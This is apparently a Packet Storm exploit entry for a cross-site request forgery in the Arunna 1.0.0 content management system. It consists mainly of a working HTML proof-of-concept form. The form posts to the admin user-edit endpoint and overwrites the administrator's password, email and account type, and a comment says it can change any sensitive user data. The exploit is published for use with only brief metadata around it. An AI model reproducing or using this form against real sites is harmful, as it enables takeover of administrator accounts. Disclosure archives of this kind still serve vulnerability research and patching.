Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormL_LPACKETSTORM:165318
HistoryDec 16, 2021 - 12:00 a.m.

Arunna 1.0.0 Cross Site Request Forgery

2021-12-1600:00:00
L_L
packetstormsecurity.com
204
JSON
`# Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)  
# Date: November 29, 2021  
# Exploit Author: =(L_L)=  
# Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/  
# Vendor Homepage: https://github.com/arunna  
# Software Link: https://github.com/arunna/arunna  
# Version: 1.0.0  
# Tested on: Ubuntu 20.04.2 LTS  
  
<!--  
The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on).   
-->  
  
<html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr>  
<tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr>  
<tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr>  
<tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr>  
<tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr>  
<tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr>  
<tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr>  
<tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr>  
<tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr>  
<tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr>  
<tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr>  
<tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr>  
<tr><td>tags[0]</td><td><input type="text" value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr>  
<tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr>  
<tr><td>email[0]</td><td><input type="text" value="[email protected]" name="email[0]"></td></tr>  
<tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr>  
<tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr>  
<tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr>  
<tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr>  
<tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr>  
<tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr>  
</table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html>  
  
`
JSON